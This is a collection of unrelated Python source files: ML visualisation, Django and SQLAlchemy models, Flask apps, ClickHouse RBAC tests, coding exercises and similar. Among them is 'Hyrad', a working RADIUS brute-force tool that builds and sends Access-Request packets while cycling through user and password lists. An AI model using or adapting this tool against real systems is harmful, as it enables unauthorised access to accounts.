# Converting / reshaping 3d encoded features to 2d (required as TSNE/PCA input)
data4TSNE = None
if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
if use_sim_matrix == False:
if use_channelwiseEncoded_for_cnnwithclassattention:
num_of_flatten_features = x_train_encoded.shape[1] * x_train_encoded.shape[2]
if use_channelcontextEncoded_for_cnnwithclassattention:
num_of_flatten_features = x_train_encoded_context.shape[1]
if use_channelcontextEncoded_for_cnnwithclassattention & use_channelwiseEncoded_for_cnnwithclassattention:
num_of_flatten_features = x_train_encoded.shape[1] * x_train_encoded.shape[2] + \
x_train_encoded_context.shape[1]
if use_each_sensor_as_single_example:
data4TSNE = np.zeros((x_train_encoded.shape[0] * x_train_encoded.shape[2], x_train_encoded.shape[1]))
else:
data4TSNE = np.zeros((x_train_encoded.shape[0], num_of_flatten_features))
for i in range(x_train_encoded.shape[0]):
if use_channelwiseEncoded_for_cnnwithclassattention:
x = np.reshape(x_train_encoded[i, :, :], (x_train_encoded.shape[1] * x_train_encoded.shape[2]), 1)
# print("x: ", x.shape)
if use_channelcontextEncoded_for_cnnwithclassattention:
y = np.squeeze(np.reshape(x_train_encoded_context[i, :], x_train_encoded_context.shape[1]))
# print("x_train_encoded[2][i]: ", x_train_encoded_context[2][i].shape)
if use_channelcontextEncoded_for_cnnwithclassattention & use_channelwiseEncoded_for_cnnwithclassattention:
x = np.concatenate((x, y))
elif use_channelcontextEncoded_for_cnnwithclassattention:
x = y
# print("x: ", x.shape)
if use_each_sensor_as_single_example:
for s in range(x_train_encoded.shape[2]):
x = np.reshape(x_train_encoded[i, :, s], (x_train_encoded.shape[1]), 1)
data4TSNE[((i - 1) * 61 + s), :] = x
else:
data4TSNE[i, :] = x
else:
data4TSNE = distance_matrix
print("data4TSNE:", data4TSNE.shape)
else:
num_of_flatten_features = x_train_encoded.shape[1] * x_train_encoded.shape[2]
data4TSNE = np.zeros((x_train_encoded.shape[0], num_of_flatten_features))
for i in range(x_train_encoded.shape[0]):
x = np.reshape(x_train_encoded[i, :, :], (x_train_encoded.shape[1] * x_train_encoded.shape[2]), 1)
data4TSNE[i, :] = x
'''
x_train_encoded_reshapedAs2d = x_train_encoded.reshape(
[x_train_encoded.shape[0], x_train_encoded.shape[1] * x_train_encoded.shape[2]])
x_test_encoded_reshapedAs2d = x_test_encoded.reshape(
[x_test_encoded.shape[0], x_test_encoded.shape[1] * x_test_encoded.shape[2]])
print("Reshaped encoded data shape train: ", x_train_encoded_reshapedAs2d.shape, ", test: ",
x_test_encoded_reshapedAs2d.shape)
'''
# Concatenate train and test data into one matrix
# x_testTrain_encoded_reshapedAs2d = np.concatenate((x_train_encoded_reshapedAs2d, x_test_encoded_reshapedAs2d),
# axis=0)
# Reducing dimensionality with TSNE or PCA
# metrics: manhattan, euclidean, cosine
if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
if use_sim_matrix:
X_embedded = TSNE(n_components=2, perplexity=50.0, learning_rate=10, early_exaggeration=30, n_iter=10000,
random_state=123, metric="precomputed").fit_transform(data4TSNE)
else:
X_embedded = TSNE(n_components=2, perplexity=50.0, learning_rate=10, early_exaggeration=30, n_iter=10000,
random_state=123, metric='manhattan').fit_transform(data4TSNE)
else:
X_embedded = TSNE(n_components=2, perplexity=50.0, learning_rate=10, early_exaggeration=10, n_iter=10000,
random_state=123, metric='manhattan').fit_transform(data4TSNE)
# X_embedded = TSNE(n_components=2, random_state=123).fit_transform(data4TSNE)
# X_embedded = PCA(n_components=2, random_state=123).fit_transform(data4TSNE)
# dt_string = datetime.now().strftime("%m-%d_%H-%M-%S")
# file_name = '../data/visualizations/' + "reducedTestFeaturesViz.npy"
# np.save(file_name, X_embedded)
# X_embedded = np.load(file_name).astype('float32')
print("X_embedded shape: ", X_embedded.shape)
# print("X_embedded:", X_embedded[0:10,:])
# Defining the color for each class
colors = [plt.cm.jet(float(i) / max(unique_labels_EncodedAsNumber)) for i in range(numOfClasses)]
# Color maps: https://matplotlib.org/examples/color/colormaps_reference.html
# colors_ = colors(np.array(unique_labels_EncodedAsNumber))
# Overriding color map with own colors
colors[0] = np.array([0 / 256, 128 / 256, 0 / 256, 1]) # no failure
'''
colors[0] = np.array([0 / 256, 128 / 256, 0 / 256, 1]) # no failure
colors[1] = np.array([65 / 256, 105 / 256, 225 / 256, 1]) # txt15_m1_t1_high_wear
colors[2] = np.array([135 / 256, 206 / 256, 250 / 256, 1]) # txt15_m1_t1_low_wear
colors[3] = np.array([123 / 256, 104 / 256, 238 / 256, 1]) # txt15_m1_t2_wear
colors[4] = np.array([189 / 256, 183 / 256, 107 / 256, 1]) # txt16_i4
colors[5] = np.array([218 / 256, 112 / 256, 214 / 256, 1]) # txt16_m3_t1_high_wear
colors[6] = np.array([216 / 256, 191 / 256, 216 / 256, 1]) # txt16_m3_t1_low_wear
colors[7] = np.array([128 / 256, 0 / 256, 128 / 256, 1]) # txt16_m3_t2_wear
colors[8] = np.array([255 / 256, 127 / 256, 80 / 256, 1]) # txt_17_comp_leak
colors[9] = np.array([255 / 256, 99 / 256, 71 / 256, 1]) # txt_18_comp_leak
'''
# Generating the plot
rowCounter = 0
for i, u in enumerate(unique_labels_EncodedAsNumber):
# print("i: ",i,"u: ",u)
for j in range(X_embedded.shape[0]):
if x_trainTest_labels_EncodedAsNumber[j] == u:
xi = X_embedded[j, 0]
yi = X_embedded[j, 1]
# print("i: ", i, " u:", u, "j:",j,"xi: ", xi, "yi: ", yi)
plt.scatter(xi, yi, color=colors[i], label=unique_labels_EncodedAsNumber[i], marker='.')
# print("X_embedded:", X_embedded.shape)
# print(X_embedded)
# print("x_trainTest_labels_EncodedAsNumber: ", x_trainTest_labels_EncodedAsNumber)
plt.title("Visualization Train(.) and Test (x) data (T-SNE-Reduced)")
lgd = plt.legend(labels=le.classes_, loc='upper center', bbox_to_anchor=(0.5, -0.05),
fancybox=True, shadow=True, ncol=3)
# plt.legend(labels=x_test_train_labels, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
# lgd = plt.legend(labels=le.classes_)
for i, u in enumerate(le.classes_):
lgd.legendHandles[i].set_color(colors[i])
lgd.legendHandles[i].set_label(le.classes_[i])
# plt.show()
plt.savefig(architecture.hyper.encoder_variant + '_' + config.filename_model_to_use + '_730.png',
bbox_extra_artists=(lgd,), bbox_inches='tight')
|
#!/usr/bin/env python
from multiprocessing.dummy import Pool
import socket, hashlib, argparse, re, textwrap, sys, select
'''
TODO
- generate random AUTHENTICATOR
- fuzzing?
'''
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# convert num to hex, i.e. 1 => \x01, 10 => \x0A etc.
# least_num_of_byte controls whether padding would be done. e.g. num =1, least_num_of_byte = 2 => \x00\x01
def int_to_hex(num, least_num_of_byte = 1):
hex_length = 2*least_num_of_byte + 2
return "{0:#0{1}x}".format(num, hex_length)[2:].decode("hex")
# encrypting the password based on https://tools.ietf.org/html/rfc2865#page-27
def enc_pass(shared_key, authenticator, password):
CHUNK_SIZE = 16
pass_ary = [password[i:i+CHUNK_SIZE] for i in range(0, len(password), CHUNK_SIZE)]
final = ""
for chunk in pass_ary:
if len(chunk) < CHUNK_SIZE:
chunk = (chunk.encode("hex") + "00" * (CHUNK_SIZE - len(chunk))).decode("hex")
md5 = hashlib.md5()
try:
xor
# subsequent run, chunk n xor MD5(shared key + chunk n-1)
md5.update(shared_key + xor)
except NameError:
# first run, chunk1 xor MD5(shared key + authenticator)
md5.update(shared_key + authenticator)
IV = md5.hexdigest()
xor = "".join(chr(ord(x) ^ ord(y)) for x, y in zip(chunk, IV.decode("hex")))
final += xor
return final
def brute(user):
RADIUS_CODE = "\x01" # access-request - https://en.wikipedia.org/wiki/RADIUS#Packet_structure
AUTHENTICATOR = "\x20\x20\x20\x20\x20\x20\x31\x34\x38\x35\x33\x37\x35\x35\x36\x33"
for idx, pwd in enumerate(allpasses):
pack_id = int_to_hex(idx%256)
# generate password related fields
AVP_PWD_TYPE = "\x02"
encrypted = enc_pass(args.secret, AUTHENTICATOR, pwd)
avp_pwd_len = len(encrypted) + len(AVP_PWD_TYPE) + 1 # reserve 1B for the length field itself
avp_pwd_len_hex = int_to_hex(avp_pwd_len%256) # 256 = 2^8 = 1 byte available for length
# generate user related fields
AVP_UNAME_TYPE = "\x01"
avp_uname_len = len(user) + len(AVP_UNAME_TYPE) + 1 # reserve 1B for the length field itself
avp_uname_len_hex = int_to_hex(avp_uname_len%256) # 256 = 2^8 = 1 byte available for length
pkt_len = avp_pwd_len + avp_uname_len + len(AUTHENTICATOR) + len(pack_id) + len(RADIUS_CODE) + 2 # reserve 2B for the length field itself
pkt_len_hex = int_to_hex(pkt_len%65536, 2) # 65536 = 2^16 = 2 bytes available for length
# send it
socket.sendto(RADIUS_CODE + pack_id + pkt_len_hex + AUTHENTICATOR + AVP_UNAME_TYPE + avp_uname_len_hex + user + AVP_PWD_TYPE + avp_pwd_len_hex + encrypted, (args.ip, int(args.port)))
ready = select.select([socket], [], [], 5)
if ready[0]:
resp_hex = socket.recv(2048).encode("hex")
print resp_hex
resp_code = resp_hex[:2]
if resp_code == "02":
print "success with secret: %s and password: %s" % (args.secret, pwd)
else:
print "Timeout"
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
%sHyrad - v0.3
An utility tool to brute force authentication service using Radius protocol.%s
''' % (bcolors.OKGREEN, bcolors.ENDC)))
parser.add_argument('ip', metavar="IP", help="Required. The IP address where the radius service is running")
parser.add_argument('-P', '--port', dest="port", help="The port of the radius service. Default 1812", default=1812)
parser.add_argument('-u', '--username', dest="user", help="The username to be used.")
parser.add_argument('--userlist', dest="userlist", help="The list of users to be used.")
parser.add_argument('-p', '--password', dest="password", help="The password to be used.")
parser.add_argument('--passlist', dest="passlist", help="The list of passwords to be tried.")
parser.add_argument('-s', '--secret', dest="secret", help="Required. The shared secret to be used", required=True)
parser.add_argument('-t', '--thread', dest="thread", help="The number of threads to be used. Default 4", default=4)
args = parser.parse_args()
# get the final list of users to try
allusers = []
if args.userlist is not None:
with open(args.userlist) as f:
allusers = f.readlines()
if args.user is not None:
allusers += [args.user]
if len(allusers) == 0:
print "\n\n%sNo user was provided. Quitting%s\n\n"%(bcolors.FAIL, bcolors.ENDC)
parser.print_help()
sys.exit(2)
# rid of new lines etc
allusers = [x.strip() for x in allusers]
# get the final list of passwords
allpasses = []
if args.passlist is not None:
with open(args.passlist) as f:
allpasses += f.readlines()
if args.password is not None:
allpasses += [args.password]
if len(allpasses) == 0:
print "\n\n%sNo password was provided. Quitting%s\n\n"%(bcolors.FAIL, bcolors.ENDC)
parser.print_help()
sys.exit(2)
allpasses = [x.strip() for x in allpasses]
# prepare socket
socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socket.setblocking(0)
pool = Pool(int(args.thread))
pool.map(brute, allusers)
pool.close()
pool.join()
|
'''
Your function should take in a single parameter (a string `word`)
Your function should return a count of how many occurences of ***"th"*** occur within `word`. Case matters.
Your function must utilize recursion. It cannot contain any loops.
'''
def count_th(word):
sub_str = 'th'
n1 = len(word)
n2 = 2
# Base Case
if (n1 == 0 or n1 < n2):
return 0
# Recursive case
if (word[0:n2] == sub_str):
return count_th(word[n2-1:]) + 1
# Otherwise return count from remaining index
return count_th(word[n2-1:])
|
from projects.golem_api.pages import auth
def test_get_token(data):
response = auth.get_token_request(data.env.users.admin.username, data.env.users.admin.password)
assert response.status_code == 200
assert type(response.json()) is str
def test_get_token_with_incorrect_password(data):
response = auth.get_token_request(data.env.users.admin.username, 'incorrect_password')
assert response.status_code == 401
def test_get_token_with_unknown_user(data):
response = auth.get_token_request('unknown_user_01', 'does not matter')
assert response.status_code == 401
|
"""
libspecinfra-python
----
Python bindings for libspecinfra
"""
__version__ = '0.0.1'
import sys
import ctypes
import os
import libspecinfra.resource
from libspecinfra.structures import SpecinfraS, BackendWrapperS
library = None
def load():
global library
if library is None:
libdir = os.path.dirname(os.path.abspath(__file__))
prefix = {'win32': ''}.get(sys.platform, 'lib')
extension = {'darwin': '.dylib', 'win32': '.dll'}.get(sys.platform, '.so')
libpath = os.path.join(libdir, '{}specinfra{}'.format(prefix, extension))
library = ctypes.cdll.LoadLibrary(libpath)
return library
class Specinfra(object):
def __init__(self, direct):
lib = load()
lib.specinfra_new.argtypes = (ctypes.POINTER(BackendWrapperS),)
lib.specinfra_new.restype = ctypes.POINTER(SpecinfraS)
lib.specinfra_free.argtypes = (ctypes.POINTER(SpecinfraS),)
self.lib = lib
self.obj = lib.specinfra_new(direct.obj)
def __exit__(self, exc_type, exc_value, traceback):
self.lib.specinfra_free(self.obj)
def file(self, path):
return libspecinfra.resource.File(self.obj, path)
|
import numpy as np
from tkinter import *
from tkinter.filedialog import askopenfilename
import cv2
import consts
from keras.models import load_model
from data import Data
from PIL import Image, ImageTk
model = load_model('trashnet.h5')
root = Tk()
PATH = StringVar()
CATIGORY = StringVar()
def browsefunc():
PATH.set(askopenfilename())
img = ImageTk.PhotoImage(Image.open(PATH.get()))
panel.configure(image=img)
panel.image = img
def predict():
if PATH.get() is not None:
input = Data.make_read_for_input(PATH.get())
prediction = Data.FromOneHot(model.predict(input))[0]
CATIGORY.set('prediction is : ' + consts.CAT[prediction])
panel = Label(root)
panel.grid(row = 0,column = 0)
browsebutton = Button(root, text="choose a image", command=browsefunc)
browsebutton.grid(row = 1,column=0)
predictbutton = Button(root, text="predict the image", command=predict)
predictbutton.grid(row = 2,column=0)
prediction = Label(root, textvariable=CATIGORY)
prediction.grid(row = 3,column=0)
mainloop() |
class ParsingError(Exception):
def __init__(self, token):
self.errorToken = token
def __str__(self):
return "Parsing error at line {}".format(self.errorToken.lineNumber)
@classmethod
def raises(cls, tok):
raise cls(tok)
|
# -*- coding: utf8 -*
from django.db import models
class FileDescriptor(models.Model):
name = models.CharField(max_length=255)
path = models.FileField(upload_to='%Y/%m/%d')
description = models.CharField(max_length=255, blank=True, null=True)
tag = models.CharField(max_length=255, blank=True, null=True)
type = models.CharField(max_length=30, blank=True, null=True)
thumbnail = models.CharField(max_length=255, blank=True, null=True)
|
import os, sys, math
import ply.lex as lex
import ply.yacc as yacc
tokens = [ # List of token names
'INT',
'FLOAT',
'NAME',
'PLUS',
'MINUS',
'DIVIDE',
'MULTIPLY',
'EQUALS',
'R_PARENTHESIS',
'L_PARENTHESIS',
'DELIMITER'
]
literals = [ '{', '}' ]
|
import numpy as np
import cv2
import cv
from Gen import Gen
class Osc(Gen):
def __init__(self, name):
Gen.__init__(self, name)
self.attrs['freq'] = 220.0
self.attrs['phase'] = 0.0
self.attrs['sync'] = 2.0
def update_attrs(self, updates = {}):
for attr_type in updates:
if attr_type in self.attrs:
self.attrs[attr_type] = updates[attr_type]
class Phasor(Osc):
def __init__(self):
Osc.__init__(self, self.__class__.__name__)
class SinOsc(Osc):
def __init__(self):
Osc.__init__(self, self.__class__.__name__)
class PulsOsc(Osc):
def __init__(self):
Osc.__init__(self, self.__class__.__name__)
self.attrs['width'] = 0.5
class SqrOsc(Osc):
def __init__(self):
Osc.__init__(self, self.__class__.__name__)
self.attrs['width'] = 0.5
class TriOsc(Osc):
def __init__(self):
Osc.__init__(self, self.__class__.__name__)
self.attrs['width'] = 0.5
class SawOsc(Osc):
def __init__(self):
Osc.__init__(self, self.__class__.__name__)
self.attrs['width'] = 1.0
|
"""
A permutation of an array of integers is an arrangement of its members into a sequence or linear order.
For example, for arr = [1,2,3], the following are considered permutations of arr: [1,2,3], [1,3,2], [3,1,2], [2,3,1].
The next permutation of an array of integers is the next lexicographically greater permutation of its integer. More formally, if all the permutations of the array are sorted in one container according to their lexicographical order, then the next permutation of that array is the permutation that follows it in the sorted container. If such arrangement is not possible, the array must be rearranged as the lowest possible order (i.e., sorted in ascending order).
For example, the next permutation of arr = [1,2,3] is [1,3,2].
Similarly, the next permutation of arr = [2,3,1] is [3,1,2].
While the next permutation of arr = [3,2,1] is [1,2,3] because [3,2,1] does not have a lexicographical larger rearrangement.
Given an array of integers nums, find the next permutation of nums.
The replacement must be in place and use only constant extra memory.
Example 1:
Input: nums = [1,2,3]
Output: [1,3,2]
Example 2:
Input: nums = [3,2,1]
Output: [1,2,3]
Example 3:
Input: nums = [1,1,5]
Output: [1,5,1]
Constraints:
1 <= nums.length <= 100
0 <= nums[i] <= 100
"""
from typing import List
class NextPermutation:
def nextPermutation(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
idx = j = len(nums) - 1
while idx > 0 and nums[idx - 1] >= nums[idx]:
idx -= 1
if idx == 0:
# nums are in descending order
nums.reverse()
return
i = idx - 1
while nums[j] <= nums[i]:
j -= 1
nums[i], nums[j] = nums[j], nums[i]
l, r = i + 1, len(nums) - 1
# reverse the second part
while l < r:
nums[l], nums[r] = nums[r], nums[l]
l += 1
r -= 1
|
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
def describe_with_privilege_granted_directly(self, node=None):
"""Check that user is able to execute DESCRIBE on a table if and only if
they have SHOW COLUMNS privilege for that table granted directly.
"""
user_name = f"user_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
table_name = f"table_name_{getuid()}"
Suite(test=describe)(grant_target_name=user_name, user_name=user_name, table_name=table_name)
@TestSuite
def describe_with_privilege_granted_via_role(self, node=None):
"""Check that user is able to execute DESCRIBE on a table if and only if
they have SHOW COLUMNS privilege for that table granted through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"), role(node, f"{role_name}"):
table_name = f"table_name_{getuid()}"
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Suite(test=describe)(grant_target_name=role_name, user_name=user_name, table_name=table_name)
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_DescribeTable_RequiredPrivilege("1.0"),
)
def describe(self, grant_target_name, user_name, table_name, node=None):
"""Check that user is able to execute DESCRIBE only when they have SHOW COLUMNS privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with table(node, table_name):
with Scenario("DESCRIBE table without privilege"):
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {grant_target_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
with Then(f"I attempt to DESCRIBE {table_name}"):
node.query(f"DESCRIBE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("DESCRIBE with privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
with Then(f"I attempt to DESCRIBE {table_name}"):
node.query(f"DESCRIBE TABLE {table_name}", settings=[("user",user_name)])
with Scenario("DESCRIBE with revoked privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
with And(f"I revoke SHOW COLUMNS on the table"):
node.query(f"REVOKE SHOW COLUMNS ON {table_name} FROM {grant_target_name}")
with Then(f"I attempt to DESCRIBE {table_name}"):
node.query(f"DESCRIBE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("DESCRIBE with revoked ALL privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
with And("I revoke ALL privilege"):
node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
with Then(f"I attempt to DESCRIBE {table_name}"):
node.query(f"DESCRIBE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("DESCRIBE with ALL privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
with Then(f"I attempt to DESCRIBE {table_name}"):
node.query(f"DESCRIBE TABLE {table_name}", settings=[("user",user_name)])
@TestSuite
def show_create_with_privilege_granted_directly(self, node=None):
"""Check that user is able to execute SHOW CREATE on a table if and only if
they have SHOW COLUMNS privilege for that table granted directly.
"""
user_name = f"user_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
table_name = f"table_name_{getuid()}"
Suite(test=show_create)(grant_target_name=user_name, user_name=user_name, table_name=table_name)
@TestSuite
def show_create_with_privilege_granted_via_role(self, node=None):
"""Check that user is able to execute SHOW CREATE on a table if and only if
they have SHOW COLUMNS privilege for that table granted directly.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"), role(node, f"{role_name}"):
table_name = f"table_name_{getuid()}"
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Suite(test=show_create)(grant_target_name=role_name, user_name=user_name, table_name=table_name)
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_ShowCreateTable_RequiredPrivilege("1.0"),
)
def show_create(self, grant_target_name, user_name, table_name, node=None):
"""Check that user is able to execute SHOW CREATE on a table only when they have SHOW COLUMNS privilege.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
with table(node, table_name):
with Scenario("SHOW CREATE without privilege"):
with When("I grant the user NONE privilege"):
node.query(f"GRANT NONE TO {grant_target_name}")
with And("I grant the user USAGE privilege"):
node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
with Then(f"I attempt to SHOW CREATE {table_name}"):
node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("SHOW CREATE with privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
with Then(f"I attempt to SHOW CREATE {table_name}"):
node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)])
with Scenario("SHOW CREATE with revoked privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
with And(f"I revoke SHOW COLUMNS on the table"):
node.query(f"REVOKE SHOW COLUMNS ON {table_name} FROM {grant_target_name}")
with Then(f"I attempt to SHOW CREATE {table_name}"):
node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("SHOW CREATE with ALL privilege"):
with When(f"I grant SHOW COLUMNS on the table"):
node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
with Then(f"I attempt to SHOW CREATE {table_name}"):
node.query(f"SHOW CREATE TABLE {table_name}", settings=[("user",user_name)])
@TestFeature
@Name("show columns")
@Requirements(
RQ_SRS_006_RBAC_ShowColumns_Privilege("1.0"),
RQ_SRS_006_RBAC_Privileges_All("1.0"),
RQ_SRS_006_RBAC_Privileges_None("1.0")
)
def feature(self, node="clickhouse1"):
"""Check the RBAC functionality of SHOW COLUMNS.
"""
self.context.node = self.context.cluster.node(node)
Suite(run=describe_with_privilege_granted_directly, setup=instrument_clickhouse_server_log)
Suite(run=describe_with_privilege_granted_via_role, setup=instrument_clickhouse_server_log)
Suite(run=show_create_with_privilege_granted_directly, setup=instrument_clickhouse_server_log)
Suite(run=show_create_with_privilege_granted_via_role, setup=instrument_clickhouse_server_log)
|
#!/usr/bin/python
# coding: utf-8
try:
import cPickle as pickle
except ImportError:
import pickle
import threading
import os
import sys
import ConfigParser
import base64
import logging
import json
import time
from subprocess import Popen
from subprocess import PIPE
from cement.core import foundation
from dc.EventObjects import URL
from dc.EventObjects import Batch
from dc.EventObjects import BatchItem
from dc.EventObjects import URLContentResponse
import app.Consts as APP_CONSTS
import app.Utils as Utils
from app.Utils import varDump
from dc_postprocessor.PostprocessorTask import PostprocessorTask
from dc_postprocessor.PostProcessingApplicationClass import PostProcessingApplicationClass
from dc_postprocessor.LinkResolver import LinkResolver
def getLogger():
# create logger
logger = logging.getLogger('console')
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
return logger
def getFileLogger():
configName = '../ini/postprocessor_task_log-rt.ini'
retval = os.getcwd()
os.chdir('..')
# read config
logging.config.fileConfig(configName)
# create logger
log = Utils.MPLogger().getLogger()
# log = logging.getLogger(APP_CONSTS.LOGGER_NAME)
os.chdir(retval)
return log
# # execute command line command
#
# @param cmd - command line string
# @param inputStream - input stream to popen
# @return result object of execution and exit code
def executeCommand(cmd, inputStream=None, log=None):
if log is not None:
log.debug("Popen: %s", str(cmd))
process = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=PIPE, shell=True, close_fds=True)
if isinstance(inputStream, basestring) and log is not None:
log.debug("process.communicate(), len(inputStream)=" + str(len(inputStream)))
(output, err) = process.communicate(input=inputStream)
if log is not None:
log.debug("Process std_error: %s", str(err))
log.debug("Process output len =" + str(len(output)))
exitCode = process.wait()
if log is not None:
log.debug("Process response exitCode: %s", str(exitCode))
return output, exitCode
def generateBatch(id=0):
siteId = id
url = 'https://retrip.jp/external-link/?article_content_id=482406'
urlObj = URL(siteId, url)
processedContent = {'link':url}
processedContents = [base64.b64encode(json.dumps(processedContent))]
urlContentResponse = URLContentResponse(url=url, processedContents=processedContents)
batchItem = BatchItem(siteId=siteId, urlId=urlObj.urlMd5, urlObj=urlObj, urlContentResponse=urlContentResponse)
batchItem.properties = {"LINK_RESOLVE":{"method":{"retrip.jp/external-link":"GET"}}}
# batchItem.properties = {}
return Batch(id, batchItems=[batchItem])
def generateInputStream(id=0):
return pickle.dumps(generateBatch(id=0))
def test(id=0, log=None):
inputFile = '/tmp/input.tmp'
outputFile = '/tmp/output.tmp'
cmd = "cd ..; ../bin/postprocessor_task.py --config=../ini/postprocessor_task-rt.ini --inputFile=%s > %s" % (str(inputFile), str(outputFile))
f = open(inputFile, 'w')
f.write(generateInputStream())
f.close()
output, exitCode = executeCommand(cmd, log=log)
if log is not None:
log.debug("len(output) = %s", str(len(output)))
log.debug("exitCode: %s", str(exitCode))
log.debug("===Finish===")
def threadRun(id=0, log=None):
sys.stdout.write("Thread ID = %s started.\n" % str(id))
test(id=id, log=log)
sys.stdout.write("Thread ID = %s stopped.\n" % str(id))
if __name__ == '__main__':
logger = getLogger()
# logger = getFileLogger()
testCount = 5
threadsList = []
for i in xrange(testCount):
threadsList.append(threading.Thread(target=threadRun, kwargs={'id':i, 'log':logger}))
threadsList[-1].start()
for i in xrange(testCount):
threadsList[i].join()
# #test(id=1, log=logger)
|
from django.db import models
class Pokemon(models.Model):
name = models.CharField(max_length=200, unique=True, blank=False)
pokemon_id = models.IntegerField(unique=True, blank=False, primary_key=True)
weight = models.IntegerField(default=0)
height = models.IntegerField(default=0)
hp = models.IntegerField(default=0)
attack = models.IntegerField(default=0)
defense = models.IntegerField(default=0)
specialAttack = models.IntegerField(default=0)
specialDefense = models.IntegerField(default=0)
speed = models.IntegerField(default=0)
evolutions = models.ManyToManyField("self", symmetrical=False, related_name="%(app_label)s_%(class)s_related")
preEvolution = models.ManyToManyField("self", symmetrical=False)
def __str__(self):
return '%d: %s' % (self.pokemon_id, self.name)
|
from flask import request, render_template
from flask_socketio import emit
from datetime import datetime
from . import data_holder
from .app import app, socket
def _broadcast(payload : dict):
emit('emit', payload, broadcast=True, namespace='/')
def _emit(payload : dict):
emit('emit', payload, broadcast=False, namespace='/')
@socket.on('connect')
def connect():
for log in data_holder.view():
_emit(log)
@socket.on('broadcast_event')
def log_via_websocket(message: dict):
_log(message.get('log', None))
@app.route("/", methods=['POST'])
def log_via_http():
message : dict = request.get_json()
_log(message.get('log', None))
return 'ack'
def _log(msg : str):
_msg = str.strip(msg) if msg is not None else None
if _msg:
payload = {'timestamp' : str(datetime.now()), 'log': msg}
data_holder.append(payload)
_broadcast(payload)
@app.route("/", methods=['GET'])
def index():
return render_template('index.html') |
from flask import Flask, render_template, request
import json
import os
import psycopg2
application = Flask(__name__)
STATIC_PATH = os.path.dirname(os.path.abspath(__file__)) + "/static"
conn = psycopg2.connect(
user=os.environ.get("PGUSER"),
host=os.environ.get("PGHOST"),
port=os.environ.get("PGPORT"),
password=os.environ.get("PGPASSWORD"),
database=os.environ.get("PGDATABASE")
)
@application.route('/')
def home():
cur = conn.cursor()
cur.execute("select * from testing")
words = cur.fetchall()
return render_template('index.html', testing=words)
if __name__ == "__main__":
application.run()
|
from enum import Enum
from sqlalchemy import Column, Integer, String
from sqlalchemy_utils.types import URLType
from upload.db.base_class import Base
class FileStatusEnum(str, Enum):
""" Перечисление доступных статусов для файла """
new: str = "new"
in_queue: str = "in queue"
finished: str = "finished"
class FileResultEnum(str, Enum):
""" Перечисление доступных вариантов звершения обработки файла """
allowed: str = "allowed"
restricted: str = "restricted"
class File(Base):
""" Модель файла, загруженного в систему """
id = Column(Integer, primary_key=True, index=True)
user_id = Column(Integer, primary_key=False, index=True, nullable=False)
status = Column(String, nullable=False, default=FileStatusEnum.new, index=True)
result = Column(String, nullable=True, index=True)
type = Column(String, nullable=False, default="audio", index=True)
saved_file_path = Column(String, nullable=False)
download_url = Column(URLType, nullable=True)
artist = Column(String, nullable=True)
title = Column(String, nullable=True)
song_link = Column(URLType, nullable=True)
|
# Generated by Django 2.1.5 on 2019-02-13 03:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
